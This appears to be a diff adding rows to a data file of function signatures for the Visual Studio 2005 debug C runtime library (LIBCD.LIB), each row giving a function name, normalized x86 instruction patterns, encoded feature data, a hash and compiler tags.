+__fltinf,"ADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND CONST,CONST\nTEST R32,R32\nJCC CONST",57No5li7u0QAAAAAnIZROA6V6Uzns2jmKE2xL228F+8AAAAAWJXrcQAAAAAAAAAA57No5g6V6UwAAAAAWLu7RGViwDBYletxUnVEOFi7u0QAAAAAbbwX7+ezaOachlE4ZWLAMAAAAAAAAAAADpXpTOezaOachlE4uoFuAShNsS9SdUQ4nIZROFi7u0Tns2jm,[],9f01d17a5376a515eb8590ebd0dc9feb52953aaa,VS2005,LIBCD.LIB
+__setargv,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],0\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32",GbE/vtXP2IVelJjuXpSY7gAAAAAAAAAA6bJXD9XP2IVelJjuFGUr6BmxP74AAAAA1c/YhQAAAAAAAAAAEIVrf/jVX9TAKSkA+NVf1OmyVw8UZSvowCkpAOmyVw8UZSvo,[],aeae30f3923c18469cfdef350c4a451d4fe037f2,VS2005,LIBCD.LIB
+__execv,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32",dYMGr6QXY2+chlE45FK8n6QXY2+chlE4dYMGr+4docRlaGAn5FK8n+4docRlaGAnZWhgJwAAAAAAAAAAnIZROORSvJ+S9NEBs1oPwORSvJ+S9NEBdYMGr5yGUTiDrkNe5FK8n5yGUTiDrkNenIZROORSvJ+S9NEBg65DXuRSvJ+S9NEBkvTRAeRSvJ91gwavkvTRAeRSvJ91gwavkvTRAeRSvJ91gwavdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvdYMGr4OuQ17uHaHE5FK8n4OuQ17uHaHEpBdjb+RSvJ+S9NEB7h2hxORSvJ+S9NEBkvTRAeRSvJ91gwavkvTRAeRSvJ91gwav,[],e6faffaf20dc7d40b1f99e0628de84f4a187c902,VS2005,LIBCD.LIB
+__wcslwr,"PUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST",XqODJwP8GHoAAAAA6H4nTF6jgyfofidMQxjgylsnTNxeo4MncVqUOiEgQSUAAAAAWydM3BzeyQxeo4MnXqODJwP8GHoAAAAAHN7JDAAAAAAAAAAAT4vMCgAAAAAAAAAAcv8ZO8Q2WmdxWpQ6XqODJwP8GHoAAAAAISBBJcuCy5XofidMxDZaZ0MY4Mpeo4Mn6H4nTF6jgycAAAAAy4LLlU+LzAoAAAAAcb9QwcuCy5XofidMXqODJ3G/UMEAAAAAA/wYegAAAAAAAAAA,[],1187ee240a53768acfd423618e40ed37e9065ed5,VS2005,LIBCD.LIB
+__assert,"LEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nADD R32,CONST\nCMP R32,CONST",JAPDnXhkZpLNvGbpzbxm6RrN6tTCNgW4wjYFuHWyi80AAAAACgNQ1o7Qh5wbjdoijtCHnMTcywe5I5MgGs3q1HWyi80AAAAAxjYZaIsNFExlZ8OogWtL/YsNFEzGNhloXyzwg8Tcywe5I5Mgiw0UTIsNFExlZ8OoxNzLB4sNFEzGNhlov8ECwQoDUNZIKCSXZWfDqMSg0gkAAAAAiw0UTHWyi81eo4MnXqODJ8Sg0gkAAAAAdbKLzQAAAAAAAAAAuSOTIIFrS/0AAAAAxKDSCQAAAAAAAAAAeGRmkr/BAsHMIqfAzCKnwAoDUNZIKCSXDG1ue828ZukkA8OdSCgkl47Qh5wbjdoiG43aIl8s8IMAAAAAJAPDnXhkZpIkA8Od,[],7168f7212f83a1fe5d1de55139657a69bcc82950,VS2005,LIBCD.LIB
+__dup,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",SmGlBlvqZy7opF1oW+pnLkn0autsZhucBmKIw0phpQbopF1o6KRdaE+LzAoAAAAAENMkcwAAAAAAAAAAT4vMCgAAAAAAAAAAbGYbnJyGUTgAAAAA7bLtN+ikXWgGYojDnIZROBDTJHOZeO5vSfRq6xDTJHOZeO5vmXjub0+LzAoAAAAA6KRdaE+LzAoAAAAA,[],4b7b6bea42f1ef62529fdb81f63671e4117324aa,VS2005,LIBCD.LIB
+__fFSINH,FLD1\nFCHS\nFXCH ST(1)\nFSCALE\nJMP CONST,P7HcZDUWchMAAAAA70by41xh3GcjPZyWsvJ1LwAAAAAAAAAANRZyEzUWchMAAAAAzAIMkIZFco8AAAAAXGHcZzUWchMAAAAAIz2clswCDJAAAAAAhkVyj7LydS8AAAAANRZyEz+x3GQAAAAA,[],546be9382e8e44b32c12ff219d7912485dc47cb2,VS2005,LIBCD.LIB
+__fFCOSH,CALL CONST\nFLD1\nFCHS\nFXCH ST(1)\nFSCALE\nJMP CONST,NRZyEzUWchMAAAAA70by4zUWchM8RPxKhkVyj7LydS8AAAAANRZyEz+x3GQAAAAAP7HcZDUWchMAAAAAsvJ1LwAAAAAAAAAAPET8SoZFco8AAAAA,[],ac5c7b913f0e7f8bc7d3b39ffc0c730a42c6191e,VS2005,LIBCD.LIB
+__mbbtype,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",l3FRnk+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJ5r8wBEAAAAAxJKmaE+LzAoAAAAAJElloMSSpmiXcVGeJTAn9w3MwAEkSWWgmvzAESUwJ/eXcVGe1hmIcSRJZaBeo4MnJElloBaKwNUNzMABDczAAU+LzAoAAAAAl3FRnk+LzAoAAAAAForA1QAAAAAAAAAA,[],0fef9dbaee7d47b4d4a22d17a51d1b3e3a0e0b1d,VS2005,LIBCD.LIB
+__mbsdec,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",QDhalQAAAAAAAAAAXUHO2U+LzAoAAAAAd9y22EA4WpVeo4MnWqCM9iQDw50NzMABmC8l00+LzAoAAAAA1MBcfAmX7pyYLyXTT4vMCgAAAAAAAAAADczAAU+LzAoAAAAACZfunEA4WpV33LbYJAPDndTAXHxdQc7ZXqODJwmX7pwAAAAA,[],e53b6d7df6fb264872a3b5994ba09a91d961ad93,VS2005,LIBCD.LIB
+__decomp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nFLD QWORD PTR SS:[EBP+CONST]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST\nJCC CONST",eKpcMAAAAAAAAAAAXdJ3RJDGnbWaNekO/mDXFAAAAAAAAAAAzp2QBtUjwXz0Ke4I+6kNFf5g1xQOlelMhbcwLNtwwo4AAAAAUAXCL9twwo4AAAAAmjXpDoW3MCxQBcIv4AVYPniqXDAAAAAAkMadtUvQGJvgugWZ1SPBfJDGnbWaNekO9CnuCF3Sd0QAAAAAac0GAP5g1xTOnZAG5Lww2/upDRXgBVg+S9AYm3iqXDAAAAAA4LoFmXiqXDAAAAAADpXpTM6dkAZpzQYA23DCjpDGnbWaNekO,[],2c3dfe6f99ee6d931288532e2f3733c84af84eb7,VS2005,LIBCD.LIB
+__get_exp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nAND R32,CONST\nSAR R32,CONST\nMOV WORD PTR SS:[EBP+CONST],R16",I+ShJAAAAAAAAAAA,[],38316989c365d633e0e4d0159d6b5db420d13c95,VS2005,LIBCD.LIB
+__add_exp,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nAND R32,CONST\nSAR R32,CONST\nMOVSX R32,R16\nMOV R32,DWORD PTR SS:[EBP+CONST]",w6UKFQAAAAAAAAAA,AEs3iAAAAAAAAAAA,e7c9367ffa360d418f213f759f30dc2517a3b168,VS2005,LIBCD.LIB
+__set_bexp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",Zc+FXQAAAAAAAAAA,[],4eb33993719d2ded324a0070e61dc4f64191843d,VS2005,LIBCD.LIB
+__set_exp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",AEs3iAAAAAAAAAAA,[],2e6b6fe0122125357f111e5731d6239b8c3ecea5,VS2005,LIBCD.LIB
+__sptype,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",l3FRngDh1msAAAAAT4vMCgAAAAAAAAAAiw0UTJRfy7KchlE4AOHWawAAAAAAAAAAlmZ05YsNFEychlE4DpXpTJdxUZ6chlE4nIZROJRfy7KXcVGel3FRngDh1msAAAAAl3FRngDh1msAAAAANOKHfk+LzAoOlelMnIZROE+LzAqXcVGenIZROIsNFEyXcVGelF/LsjTih36XcVGel3FRngDh1msAAAAA,[],9d62a0abf1d5eaac9a35fc7256d585152b1fc975,VS2005,LIBCD.LIB
+__stricoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",SxE79QAAAAAAAAAAPz4kcZgvJdNeo4MnchMCgD8+JHFAPBIrT4vMCgAAAAAAAAAAQDwSK0+LzAoAAAAAXqODJ0sRO/UAAAAAmC8l00+LzAoAAAAA,[],2c4bebc1bce14b691800b8cc2ff7ab7b4632e9dd,VS2005,LIBCD.LIB
+__mbsnbicoll,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",l3FRnk+LzAoAAAAAjLRRThJeiAMNzMABi7I25QAAAAAAAAAADczAAU+LzAoAAAAAT4vMCgAAAAAAAAAAEl6IA4uyNuWXcVGe,[],c8fe66a5180e5a36a384a87c36f529cbbb779b09,VS2005,LIBCD.LIB
+?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,"MOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",UFYckSQDw50EgxODBIMTg4D9In7ehH1tjiDRcyQDw53zlHY9BjcQpF5htw8AAAAAJAPDnYD9In7ehH1t85R2PSQDw51QVhyR3oR9bYD9In4GNxCkgP0ifgAAAAAAAAAAXmG3DwAAAAAAAAAA,[],8ddda0ab03340a739057551d07d02f265c21015a,VS2005,LIBCD.LIB
+?__CxxRestoreUnhandledExceptionFilter@@YAXXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",XjaAjAAAAAAAAAAA,[],6eca561c649f31dca5ec8f99d87bedfb3de56681,VS2005,LIBCD.LIB
+?__CxxSetUnhandledExceptionFilter@@YAXXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nPOP EBP\nRETN",yvr3jgAAAAAAAAAA,[],fcd00fc52bf6e2538a7bf42896cd3afea26557bc,VS2005,LIBCD.LIB
+_wprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBdYMGr5yGUTho27TX5FK8n5yGUTho27TXkvTRAeRSvJ91gwavaNu01wAAAAAAAAAAmY/2juRSvJ+S9NEB,[],89bd97b99318d95dfeb6dbbd27b342cc3954c5de,VS2005,LIBCD.LIB
+__msize_base,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32",mwfGPgAAAAAAAAAACUvRWdUc1LYAAAAA1RzUtgAAAAAAAAAA4ZGXtpsHxj4JS9FZ,[],648c42aefcdc698d27c1c5346736b23640216fa9,VS2005,LIBCD.LIB
+__wsopen,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32",nRwbq+ikXWjBm6AunIZROPQp7gheo4MnALyuivQp7gichlE4T4vMCgAAAAAAAAAA6KRdaE+LzAoAAAAAXqODJ+ikXWgAAAAAAP51atTZ7stSZ38G9CnuCJ0cG6sAAAAA6KRdaE+LzAoAAAAA1Nnuy/Qp7gichlE4C9OeU9TZ7ssAAAAAUmd/BmaCnLsL055T9CnuCJ0cG6sAAAAAnIZROPQp7gichlE4Umd/BtTZ7stSZ38GwZugLgAAAAAAAAAAZoKcu9TZ7ssAvK6KjseVaVJnfwYAAAAAJCYl6AD+dWqOx5Vp9CnuCJ0cG6sAAAAA,[],682bdad0a268c5db5c3766e329ebbacfde305b7a,VS2005,LIBCD.LIB
+__wopen,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",Elr+TgAAAAAAAAAA,nRwbq+ikXWjBm6AunIZROPQp7gheo4MnALyuivQp7gichlE46KRdaE+LzAoAAAAAUmd/BmaCnLsL055TXqODJ+ikXWgAAAAAAP51atTZ7stSZ38G9CnuCJ0cG6sAAAAAjseVaVJnfwYAAAAA6KRdaE+LzAoAAAAA1Nnuy/Qp7gichlE4C9OeU9TZ7ssAAAAAZoKcu9TZ7ssAvK6K9CnuCJ0cG6sAAAAAnIZROPQp7gichlE4wZugLgAAAAAAAAAAT4vMCgAAAAAAAAAA9CnuCJ0cG6sAAAAAUmd/BtTZ7stSZ38GJCYl6AD+dWqOx5Vp,374c3aeedb1623147c0dc561f1353e1c48b874c4,VS2005,LIBCD.LIB
+__wspawnlp,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",kvTRAeRSvJ91gwavkvTRAeRSvJ91gwavISBBJeRSvJ+S9NEBdYMGryEgQSUk4ijN5FK8nyEgQSUk4ijNkvTRAeRSvJ91gwavnIZROORSvJ+S9NEBISBBJeRSvJ+S9NEBJOIozQAAAAAAAAAA5FK8nyEgQSWchlE4kvTRAeRSvJ91gwavs1oPwORSvJ+S9NEBdYMGr5yGUTghIEEl5FK8n5yGUTghIEEldYMGryEgQSWchlE4nIZROORSvJ+S9NEBdYMGr5yGUTghIEEl5FK8n5yGUTghIEEl,[],b4d4313eb2f55aeded54721f58d249dd340339a8,VS2005,LIBCD.LIB
+_sqrt,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",0UiUpXtGESB7RhEg6FWr2pDioRHoVava0UiUpYp8rQWKfK0FzSwRpjfULVPoVava6FWr2pDioRHNLBGmEd84xIp8rQWKfK0F6FWr2tFIlKWQ4qERe0YRIAAAAAAAAAAAzSwRppDioRFeo4MnnO5/MOhVq9rI1XvEinytBehVq9oAAAAAkOKhEXtGESB7RhEgXqODJ9FIlKUAAAAAN9QtU9FIlKUAAAAA2N0DXuhVq9qc7n8w6FWr2uhVq9oR3zjE6FWr2jfULVPNLBGmyNV7xOhVq9oR3zjE,[],807157b61d252c59a923c42107f48dc1ccc25cef,VS2005,LIBCD.LIB
+__CIsqrt,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,AaF1swAAAAAAAAAAdqHX0LygXegBoXWzvKBd6AAAAAAAAAAA,18fa56abdc67cd83ef6c0d80e151d8503c69dc2a,VS2005,LIBCD.LIB
+_sscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavnIZROORSvJ+S9NEB4zQlwuRSvJ+S9NEBdYMGr5yGUThQv3kJ5FK8n5yGUThQv3kJkvTRAeRSvJ91gwavUL95CQAAAAAAAAAA,[],14660eaeac5b6d54df8cb125fe29f7b92eff8bea,VS2005,LIBCD.LIB
+??_N@YGXPAXIHP6EX0@Z1@Z,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",8m6bBgmX7pwAAAAAvw9iyAAAAAAAAAAACZfunPShJ3nybpsG9KEneb8PYsgAAAAAK6ElgoOuQ14AAAAAg65DXvShJ3nybpsG,[],de2f7077fa9c0accaa95ec2b0aaabf0581bf832b,VS2005,LIBCD.LIB
+__mktemp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",bUkFBm1JBQachlE4dYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvnIZROG1JBQZP9msepBdjb+RSvJ+S9NEBT/ZrHgmX7pwAAAAA3Qr7TW1JBQZtSQUGkvTRAeRSvJ91gwavZgA5h8Sg0gkAAAAA6V6FvXTA+HAAAAAAdYMGr6QXY28Xx34u5FK8n6QXY28Xx34uF8d+LgmX7pzIUl/XbUkFBg3MwAGchlE4yEPjSAAAAAAAAAAApBdjbwmX7pzIUl/XJAPDnchD40jE8bdlAIiBoeRSvJ+S9NEBnIZRONLwSCINzMABxKDSCQAAAAAAAAAADczAAcSg0gkAAAAA0vBIIsTxt2UkA8OdCZfunG1JBQbdCvtNnIZROORSvJ+S9NEByFJf16QXY28AAAAAkvTRAeRSvJ91gwavdMD4cMTxt2UkA8OdxPG3Zelehb1mADmH,[],8b7b5f492946c0a0aa30c0bc73d79130d8030734,VS2005,LIBCD.LIB
+__wexeclp,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32\nPOP R32",kvTRAeRSvJ91gwavkvTRAeRSvJ91gwavISBBJeRSvJ+S9NEBdYMGryEgQSVJLfH35FK8nyEgQSVJLfH3kvTRAeRSvJ91gwavdYMGryEgQSWchlE45FK8nyEgQSWchlE4SS3x9wAAAAAAAAAAkvTRAeRSvJ91gwavs1oPwORSvJ+S9NEBISBBJeRSvJ+S9NEBdYMGr5yGUTghIEEl5FK8n5yGUTghIEElnIZROORSvJ+S9NEBnIZROORSvJ+S9NEBdYMGr5yGUTghIEEl5FK8n5yGUTghIEEl,[],bcc864d7b387fda8bf6cf6c1ef56c07e745282ca,VS2005,LIBCD.LIB
+__strnicoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",SxE79QAAAAAAAAAAJgwaipgvJdNeo4MnJAPDnSYMGood0S+sHdEvrE+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAjLRRTiQDw50NzMABmC8l00+LzAoAAAAAXqODJ0sRO/UAAAAA,[],39461d4055edf17044555fe6983ff84c2106765c,VS2005,LIBCD.LIB
+_memcpy,"SHR CONST,CONST\nAND CONST2,CONST\nCMP R32,CONST\nJCC CONST",rxBtEAAAAAAAAAAASDQjuwAAAAAAAAAACP52cQAAAAAAAAAAh6NtfSOW2RpY2ig6DrNBdwAAAAAAAAAAhuPK6Eg0I7sI/nZxWNooOobjyugvGjTcG1tgnQAAAAAAAAAASDQjuwAAAAAAAAAArLCxdVjaKDqHo219Lxo03Eg0I7uvEG0QLxo03BtbYJ0Os0F3CP52cQAAAAAAAAAAhuPK6Eg0I7sI/nZxSDQjuwAAAAAAAAAAI5bZGobjyugvGjTc,[],0c78b090c42b41060d0e37019302528728b730bd,VS2005,LIBCD.LIB
+__woutput,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOVSX R32,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",YZ99hwVp/9EAAAAABWn/0cDNMtd+RkN0fkZDdMDNMtebORlvUyrwCjUWchM70T3zmzkZb1Mq8ApmjnDbAk0/mzUWchM70T3zZo5w2wJNP5sAAAAAmzkZb1Mq8AqbORlvNRZyEwVp/9EAAAAAwM0y1wAAAAAAAAAAO9E98wAAAAAAAAAA,[],e98299a487a622d6873f8b031aa202b6443ff889,VS2005,LIBCD.LIB
+_cos,FLD TBYTE PTR DS:[0]\nFXCH ST(1)\nFPREM1\nWAIT\nFSTSW R16\nSAHF\nJCC CONST,BW1m0CywKTdvZoaA0UiUpYp8rQWKfK0FzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAAinytBQVtZtAAAAAALLApNyywKTdvZoaAkOKhEXtGESB7RhEgnO5/MCywKTeP65feb2aGgNFIlKUAAAAAAFkkeehVq9qc7n8wj+uX3gVtZtDRSJSlN9QtU9FIlKUAAAAA0UiUpXtGESB7RhEgLLApNwVtZtDRSJSl6FWr2jfULVPNLBGm,[],ed242af814640323d4430cc24aa9ed15e8741221,VS2005,LIBCD.LIB
+__CIcos,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,a546b35194009c601768b18e6a48dd7d0d9faa4b,VS2005,LIBCD.LIB
+__chkesp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,0\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32",O4+r5UiIZS0AAAAASIhlLQAAAAAAAAAAIYd5Y9d0r7sBoXWzAaF1swAAAAAAAAAA13Svu0iIZS07j6vl,[],6e355b61c6264b2892d1b7f5a75e9da12bec4dfd,VS2005,LIBCD.LIB
+__getdrive,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",1RzUtgAAAAAAAAAAK1x4qdUc1LYtvJZtLbyWbdUc1LYAAAAA5azpC9Uc1LYrXHip,[],4591171d21e92f155f425803845acca070d1c329,VS2005,LIBCD.LIB
+__chdrive,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nMOV ESP,EBP\nPOP EBP\nRETN",+umL6/aiguINzMABnIZROPrpi+uDEaxc9qKC4gAAAAAAAAAAgxGsXE+LzAoAAAAADczAAU+LzAoAAAAAT4vMCgAAAAAAAAAAjLRRToMRrFychlE4,[],896f2c5fdaa5c0e12659194013785aa0effca3c8,VS2005,LIBCD.LIB
+__FillZeroMan,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",1mS0FdTZ7ssAAAAA1Nnuy0+LzArWZLQVnIZROE+LzArWZLQVojkvFZyGUTgAAAAAT4vMCgAAAAAAAAAA,[],0eae6e06d148c9c3e2e603fc4ca451569039c2c6,VS2005,LIBCD.LIB
+__ld12tod,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",AdWQJwAAAAAAAAAA,8j2gLzUWchMAAAAAKdmrsNUc1LbxZLvOlspbAfPdLQwAAAAA7HaGu0qIAMtZGXL99CnuCDUWchMAAAAAMyqErfCSAOk1u44huHMDS/PdLQwAAAAA8WS7ztUc1LYAAAAANRZyE/PdLQwAAAAA0skfifPdLQwAAAAAfy58ktUc1LYAAAAAZais8fI9oC/0Ke4I8JIA6ex2hru4cwNL1RzUtgAAAAAAAAAA890tDCnZq7B/LnySSogAy5bKWwHSyR+JWRly/fPdLQwAAAAAbWJdBTMqhK1lqKzxNbuOIex2hru4cwNL,313d543b892e7bccc60c0c09b307bb5e2cd68ed9,VS2005,LIBCD.LIB
+__atodbl,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",4VTcJwAAAAAAAAAA,nIZROGnNBgB7qn/hnIZROGKoXH4sk5c/YqhcfgAAAAAAAAAAe6p/4d/cdGYSm+oUrf0auRdP+qgAAAAAOsWmFF6jgycAAAAALJOXP2KoXH4AAAAAXqODJ5yGUTgAAAAAnhVI05yGUTgAAAAAF0/6qJyGUThNKANJm0EHkzUWchO2oJo939x0Zp4VSNPIUl/XbUkFBmnNBgBeo4MnTSgDSZyGUTgAAAAAtqCaPQAAAAAAAAAAnIZROIsNFExNKANJnIZROJyGUTjegR2vTSgDSYsNFEwAAAAA3oEdr2KoXH4AAAAAac0GAJ4VSNPIUl/Xiw0UTIsNFEz0Ke4IyFJf16QXY28AAAAA9CnuCF6jgycAAAAA09p6H16jgydtSQUGPsqG2aQXY28AAAAAiw0UTDrFphT0Ke4IbUkFBl6jgydtSQUGpBdjb7Qf3zZenfrE9CnuCF6jgycAAAAAwJexuG1JBQYAAAAANRZyE2nNBgAAAAAAbUkFBl6jgydtSQUGnIZROJyGUThQ25n2Xp36xD7KhtkAAAAA0bKtvZyGUThpzQYAUNuZ9mKoXH4AAAAAbUkFBl6jgydtSQUGac0GAJyGUThpzQYAtB/fNhdP+qit/Rq5EpvqFJ4VSNPIUl/Xac0GAJyGUTichlE4XqODJ9Paeh8AAAAAac0GANGyrb2bQQeT,afa6bdced6d856a6bfde03469e12f4fe9c8902a7,VS2005,LIBCD.LIB
+__ld12tof,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",AdWQJwAAAAAAAAAA,WRly/fPdLQwAAAAA8j2gLzUWchMAAAAAKdmrsNUc1LbxZLvOlspbAfPdLQwAAAAA9CnuCDUWchMAAAAAMyqErfCSAOk1u44huHMDS/PdLQwAAAAA8WS7ztUc1LYAAAAA0skfifPdLQwAAAAAfy58ktUc1LYAAAAAZais8fI9oC/0Ke4ISogAy5bKWwHSyR+J1RzUtgAAAAAAAAAA8JIA6ex2hru4cwNL7HaGu0qIAMtZGXL9bWJdBTMqhK1lqKzx890tDCnZq7B/LnySNbuOIex2hru4cwNLNRZyE/PdLQwAAAAA,313d543b892e7bccc60c0c09b307bb5e2cd68ed9,VS2005,LIBCD.LIB
+__ld12told,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32+CONST]\nAND R32,CONST",nIsyhkG64HBphMJnaYTCZ0G64HAAAAAATJXmDAAAAAAAAAAAlnPwX0yV5gwAAAAAQbrgcEyV5gyWc/Bf,[],0fdabfa6279936f2f461918248b2d59cb400d9fb,VS2005,LIBCD.LIB
